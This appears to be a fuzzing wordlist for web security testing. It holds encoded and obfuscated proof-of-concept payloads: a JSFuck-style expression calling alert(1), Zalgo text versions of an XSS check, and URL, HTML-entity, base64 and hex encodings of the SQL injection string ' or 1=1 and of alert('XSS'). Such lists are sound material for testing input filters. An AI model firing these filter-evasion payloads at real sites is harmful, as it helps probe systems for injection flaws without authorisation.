# Fuzz strings with different encodings applied

# Non-alphanumeric way of calling the classic XSS check "alert(1)" in JavaScript (note that this is a single line that doesn't include the parentheses)
([],[][[![]+[]][+[]][++[[]][+[]]+[++[[]][+[]]][+[]]+[++[[]][+[]]][+[]]]+[[]+{}][+[]][+!![]]+[!![] +[]][+[]][+!![]]+[!![]+[]][+[]][+[]]])()[[![]+[]][+[]][++[[]][+[]]]+[![]+[]][+[]][++[[]][+[]]+[++ [[]][+[]]][+[]]]+[![]+[]][+[]][++[[]][+[]]+[++[[]][+[]]][+[]]+[++[[]][+[]]][+[]]+[++[[]][+[]]][+ []]]+[!![]+[]][+[]][+!![]]+[!![]+[]][+[]][+[]]](+!![]) 

# Zalgo text of the name Scott
s&#784;&#786;&#783;&#789;&#829;&#780;&#826;&#818;&#854;&#801;&#802;&#804;&#866;&#860;&#822;c&#842;&#832;&#833;&#842;&#785;&#865;&#827;&#805;&#800;&#811;&#816;&#863;&#839;&#825;&#826;&#827;&#824;o&#782;&#842;&#781;&#782;&#842;&#829;&#803;&#845;&#863;&#790;&#800;&#858;&#820;t&#855;&#844;&#780;&#768;&#848;&#848;&#828;&#801;&#827;&#805;&#857;&#799;&#793;t&#849;&#786;&#787;&#774;&#788;&#859;&#850;&#777;&#789;&#827;&#799;&#793;&#852;&#819;&#837;&#809;

# Zalgo text of the classic XSS check alert('XSS')...done at zalgotextgenerator.com (should be all on one line)
a&#786;&#780;&#775;&#782;&#768;&#783;&#843;&#852;&#840;&#860;&#851;&#803;&#807;&#808;&#816;&#826;&#822;l&#849;&#770;&#830;&#835;&#783;&#865;&#853;&#828;&#808;&#857;&#811;&#814;&#846;&#810;&#804;e&#785;&#771;&#787;&#775;&#836;&#831;&#849;&#775;&#801;&#807;&#828;&#828;&#798;&#800;&#791;&#816;&#840;&#808;&#822;r&#783;&#795;&#776;&#776;&#779;&#848;&#842;&#769;&#854;&#792;&#793;&#815;&#791;&#821;t&#786;&#834;&#831;&#830;&#783;&#864;&#855;&#787;&#769;&#853;&#860;&#803;&#863;&#807;&#808;&#803;&#857;(&#783;&#782;&#864;&#832;&#782;&#850;&#844;&#836;&#792;&#866;&#853;&#827;&#818;&#805;&#811;&#802;&#812;&#793;'&#829;&#783;&#843;&#843;&#855;&#809;&#798;&#797;&#866;&#839;X&#835;&#861;&#777;&#774;&#786;&#788;&#834;&#834;&#855;&#840;&#813;&#796;&#826;&#796;&#808;&#807;&#818;&#821;S&#770;&#843;&#781;&#836;&#834;&#849;&#778;&#856;&#779;&#813;&#791;&#827;&#818;&#810;&#817;&#860;&#812;&#863;&#816;S&#779;&#788;&#829;&#855;&#859;&#863;&#825;&#801;&#839;&#790;&#840;&#858;&#826;&#792;&#823;'&#834;&#789;&#844;&#782;&#772;&#834;&#856;&#864;&#831;&#814;&#799;&#814;&#814;&#801;&#810;&#814;&#846;&#808;&#841;)&#789;&#771;&#773;&#844;&#788;&#785;&#859;&#800;&#792;&#825;&#792;&#816;&#824;

# Encodings of the classic ' or 1=1 SQL injection string...done in Burp's Decoder
%27%20%6f%72%20%31%3d%31
&#x27;&#x20;&#x6f;&#x72;&#x20;&#x31;&#x3d;&#x31;
JyBvciAxPTE=
27206f7220313d31

# Encodings of the classic XSS check alert('XSS')...done in Burp's Decoder
%61%6c%65%72%74%28%27%58%53%53%27%29
&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x27;&#x58;&#x53;&#x53;&#x27;&#x29;
YWxlcnQoJ1hTUycp
616c65727428275853532729
